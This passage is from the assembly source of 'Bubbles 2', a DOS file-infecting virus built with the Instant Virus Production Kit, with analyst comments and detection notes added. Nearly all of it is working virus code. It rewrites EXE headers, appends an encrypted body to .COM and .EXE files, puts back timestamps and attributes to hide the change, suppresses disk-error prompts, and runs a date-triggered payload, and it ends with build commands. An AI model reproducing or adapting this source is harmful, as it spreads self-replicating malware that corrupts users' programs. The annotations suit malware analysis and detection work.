📄 bubbles2.asm
shl ax,cl
xchg ax,bx
les ax,[bp+offset DTA+26] ; get files size from dta
mov dx,es ; its now in dx:ax
push ax ; save these
push dx
sub ax,bx ; subtract header size from fsize
sbb dx,0 ; subtract the carry too
mov cx,10h ; convert to segment:offset form
div cx
mov word ptr [bp+buffer+14h],dx ; put in new header
mov word ptr [bp+buffer+16h],ax ; cs:ip
mov word ptr [bp+buffer+0eh],ax ; ss:sp
mov word ptr [bp+buffer+10h],id ; put id in for later
pop dx ; get the file length back
pop ax
add ax,eof-virus ; add virus size
adc dx,0 ; add with carry
mov cl,9 ; calculates new file size
push ax
shr ax,cl
ror dx,cl
stc
adc dx,ax
pop ax
and ah,1
mov word ptr [bp+buffer+4],dx ; save new file size in header
mov word ptr [bp+buffer+2],ax
push cs ; es = cs
pop es
mov cx,1ah ; Size of EXE header
;-----------------------------------------------------------------------
; FinishInfection / get_time / CloseFile  (16-bit DOS, TASM syntax)
; Analyst summary: writes the modified header held in [bp+buffer] to the
; target file, appends the virus body, then restores the file's original
; timestamp and attributes.
; In:    cx = number of header bytes to write (1Ah on the EXE path above)
;        [bp+DTA] = find-first/find-next record for the target file
; Falls through FinishInfection -> get_time -> CloseFile; ends with retn.
; Detection note: the file's date/time and attributes are put back to the
; values recorded in the DTA, so neither is a reliable indicator of
; modification. File size growth and the rewritten header are; compare
; against a known-good hash or baseline instead.
;-----------------------------------------------------------------------
FinishInfection:
push cx ; save # of bytes to write
xor cx,cx ; Set attributes to none (clears read-only etc. so the open for write succeeds)
call attributes
mov al,2 ; open file read/write
call open
; The handle was just opened, so this write lands at the start of the file
; and overwrites the original header bytes with the contents of buffer.
mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Location of bytes
pop cx ; Get number of bytes to write
int 21h
jc closefile ; write failed: skip the append, still restore time/attributes
mov al,02 ; Move Fpointer to eof
Call move_fp
get_time:
; The seconds field of the DOS clock is used as the one-byte key.
; Zero is rejected and re-read, so the stored key is always in 1..59.
mov ah,2ch ; Get time for encryption value
int 21h
cmp dh,0 ; If its seconds are zero get another
je get_time
mov [bp+enc_value],dh ; Use seconds value for encryption
call encrypt_infect ; Encrypt and infect the file
inc [bp+counter] ; Increment the counter
CloseFile:
; Anti-forensic clean-up: original time/date come from DTA+16h/DTA+18h and
; the original attribute byte from DTA+15h, all captured before the write.
mov ax,5701h ; Set files date/time back
mov cx,word ptr [bp+dta+16h] ; Get old time from dta
mov dx,word ptr [bp+dta+18h] ; Get old date
int 21h
mov ah,3eh ; Close file
int 21h
xor cx,cx
mov cl,byte ptr [bp+dta+15h] ; Get old Attributes
call attributes
retn
;-----------------------------------------------------------------------
; Activate / Dont_Activate
; Analyst summary: date/time-gated payload. The visible checks require
; year >= 1993, day-of-month == 13 and hour == 13; only then is the
; '$'-terminated text at messege printed via INT 21h/AH=09h.
; After the print, cx is set to 2 and an external file (phasor.rtn) is
; assembled in-line. That file is not part of this listing, so what runs
; after the message cannot be determined from this page.
; Triage note: a sandbox run with an unmodified clock will normally not
; reach this branch; the trigger condition is the three compares below.
;-----------------------------------------------------------------------
Activate:
mov ah,2ah ; Get current date
int 21h
cmp cx,1993 ; Check current Year
jb dont_activate
cmp dl,13 ; Check current Day
jne dont_activate
mov ah,2ch ; Get current time
int 21h
cmp ch,13 ; Check current hour
jne dont_activate
mov ah,9 ; Display string
lea dx,[bp+messege] ; The string to display
int 21h
mov cx,2
include .\routines\phasor.rtn ; Include file (contents not shown in this listing)
Dont_Activate:
ret
;-----------------------------------------------------------------------
; Move_Fp - seek helper (INT 21h/AH=42h) with a zero offset in cx:dx.
; In:    al = seek origin (the caller above passes 2 = end of file)
;        bx = file handle
; Clobb: ah, cx, dx; DOS returns the new position in dx:ax
;-----------------------------------------------------------------------
Move_Fp:
mov ah,42h ; Move file pointer
xor cx,cx ; Al has location
xor dx,dx ; Clear these
int 21h
retn
;-----------------------------------------------------------------------
; Set_DTA - point DOS at a different Disk Transfer Area (INT 21h/AH=1Ah).
; In:    ds:dx = address of the new DTA
; NOTE(review): the callers are outside this listing; the DTA buffer
; declared near the end of the file suggests the search results are
; redirected away from the host program's own DTA - confirm at the callers.
;-----------------------------------------------------------------------
Set_DTA:
mov ah,1ah ; Move the DTA location
int 21h ; DX has location
retn
;-----------------------------------------------------------------------
; Open - open the file named in the current DTA record (INT 21h/AH=3Dh).
; In:    al = access mode (the caller above passes 2 = read/write)
; Out:   bx = value DOS returned in ax (the handle on success)
; The carry flag from INT 21h is not checked here, so on failure bx holds
; the DOS error code rather than a handle.
;-----------------------------------------------------------------------
Open:
mov ah,3dh ; open file
lea dx,[bp+DTA+30] ; Filename in DTA
int 21h
xchg ax,bx ; put file handle in bx
ret
;-----------------------------------------------------------------------
; Attributes - set the attributes of the file named in the DTA record
; (INT 21h/AX=4301h).
; In:    cx = attribute word to apply (0 to clear, or the saved original)
; Monitoring note: the visible flow calls this twice per target, first
; with cx = 0 and later with the saved value, so a set-attribute pair
; around a write to an executable is the observable sequence.
;-----------------------------------------------------------------------
Attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+DTA+30] ; filename in DTA
int 21h
ret
;-----------------------------------------------------------------------
; int24 - replacement critical-error (INT 24h) handler.
; Returns al = 3, which tells DOS to fail the pending call instead of
; prompting the user. With this installed, an attempted write to a
; write-protected disk produces no "Abort, Retry, Fail?" prompt.
; NOTE(review): the code that installs this handler and saves the old
; vector (see OldInt24) is outside this listing.
;-----------------------------------------------------------------------
int24: ; New Int 24h
mov al,3 ; Fail call
iret ; Return from int 24 call
;-----------------------------------------------------------------------
; Static strings and small data.
; Analyst note: the name, author and '[IVP2]' kit marker are literal byte
; strings in the body. Whether they appear in clear inside an infected
; file depends on whether they fall in the range processed by
; Encrypt_Decrypt; encrypt_start is not visible in this listing, so verify
; on a sample before building a string signature on them.
;-----------------------------------------------------------------------
Virusname db 'Bubbles 2' ; Name Of The Virus
Author db 'Admiral Bailey' ; Author Of This Virus
; Payload text printed by Activate; the run of db lines ends at the '$'
; terminator on the Made_with line, so all four lines are printed together.
messege:
db 'Bubbles 2 : Its back and better then ever.',10,13
db ' ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^',10,13
db 'Is it me or does that Make no sense at all?',10,13
Made_with db '[IVP2]',10,13,'$' ; Please do not remove this
; Search masks and the parent-directory name; they show that both .COM and
; .EXE files are targeted and that the search can move to '..'.
comfilespec db '*.com',0 ; Holds type of file to look for
exefilespec db '*.exe',0 ; Holds type of file to look for
directory db '..',0 ; Directory to change to
; NOTE(review): presumably holds the host's saved first bytes on the COM
; path (initial value is an INT 20h terminate); its users are not shown here.
oldjump db 0cdh,020h,0,0,0 ; Old jump. Is int 20h for file quit
;-----------------------------------------------------------------------
; Encrypt_Infect
; Analyst summary: copies the bytes between move_begin and move_end into
; the Workarea buffer and calls the copy. The copied routine is the one
; that transforms the body, writes it to the file and transforms it back.
; In:    bx = open file handle, bp = base offset used for all data refs
; Uses ds:si -> es:di for the copy; es must address the same segment as
; the code for the copy and the later call to agree.
; NOTE(review): running from a copy presumably keeps the executing
; instructions outside the range being rewritten in memory - confirm
; against where encrypt_start is defined.
;-----------------------------------------------------------------------
Encrypt_Infect:
lea si,[bp+offset move_begin] ; Location of where to move from
lea di,[bp+offset workarea] ; Where to move it to
mov cx,move_end-move_begin ; Number of bytes to move
move_loop:
movsb ; Moves this routine into heap
loop move_loop
lea dx,[bp+offset workarea]
call dx ; Jump to that routine just moved
ret
;-----------------------------------------------------------------------
; Move_Begin .. move_end - relocatable routine executed from Workarea.
; Sequence: call the routine at encrypt_end (Encrypt_Decrypt), write
; eof-virus bytes starting at the label virus to the handle in bx, then
; call the same routine again so the in-memory copy is restored.
; All calls go through dx with bp-relative addresses, so the routine does
; not depend on where it was copied to.
; Sizing note: each infection appends exactly eof-virus bytes; the fixed
; growth is a usable indicator when comparing against a clean baseline.
;-----------------------------------------------------------------------
Move_Begin equ $ ; Marks beginning of move
push bx ; Save the file handle
lea dx,[bp+offset encrypt_end]
call dx ; Call the encrypt_decrypt procedure
pop bx ; Get handle back in bx and return
mov ah,40h ; Write to file
mov cx,eof-virus ; Number of bytes
lea dx,[bp+offset virus] ; Where to write from
int 21h
push bx ; Save the file handle
lea dx,[bp+offset encrypt_end]
call dx ; Decrypt the file and return
pop bx ; Get handle back in bx and return
ret
move_end equ $ ; Marks the end of move
;-----------------------------------------------------------------------
; Encrypt_Decrypt - in-place pass over encrypt_start..encrypt_end using
; the single byte at enc_value.
; Encrypt_End marks both the end of the processed range and the address
; of this routine, so the routine itself and everything after it
; (including Enc_Value) lie outside the processed range.
; XOR with a fixed byte is its own inverse, which is why the same routine
; is called once before and once after the file write.
; Key space is one byte taken from the clock's seconds (1..59).
; NOTE(review): LODSB/STOSB move each byte through AL, while the XOR
; below operates on AH, so as written the byte stored appears to equal
; the byte loaded. Confirm on a sample before assuming the on-disk body
; is transformed; if it is not, plain byte signatures over the body apply.
; Requires es to address the code segment for STOSB (set up by callers).
;-----------------------------------------------------------------------
Encrypt_End equ $ ; Marks the end of encryption
Encrypt_Decrypt:
mov cx,encrypt_end-encrypt_start ; bytes to encrypt
lea si,cs:[bp+encrypt_start] ; start of encryption
mov di,si
encloop:
lodsb
xor ah,cs:[bp+enc_value]
stosb
loop encloop
ret
;-----------------------------------------------------------------------
; Key byte, end-of-body marker and run-time scratch storage.
; Enc_Value is defined after Encrypt_End and before EOF: it is inside the
; eof-virus range that gets written to the file but outside the range the
; XOR pass covers, so the key byte is stored unmodified as the last byte
; of the appended body.
; Everything after EOF is working storage only; the file write covers
; eof-virus bytes, so these buffers are not part of what is appended.
;-----------------------------------------------------------------------
Enc_Value db 00h ; Hold the encryption value 00 for nul effect
EOF equ $ ; Marks the end of file
Counter db 0 ; Infected File Counter
Workarea db move_end-move_begin dup (?) ; Holds the encrypt_infect routine
currentdir db 64 dup (?) ; Holds the current dir
DTA db 42 dup (?) ; Location of new DTA
Buffer db 1ah dup (?) ; Holds exe header
OldInt24 dd ? ; Storage for old int 24h handler
Filler db 3000 dup (0)
eov equ $ ; Used For Calculations
code ends
end start
;---------
; Instant Virus Production Kit By Admiral Bailey - Youngsters Against McAfee
; To compile this use TASM /M FILENAME.ASM
; Then type tlink /t FILENAME.OBJ
;---------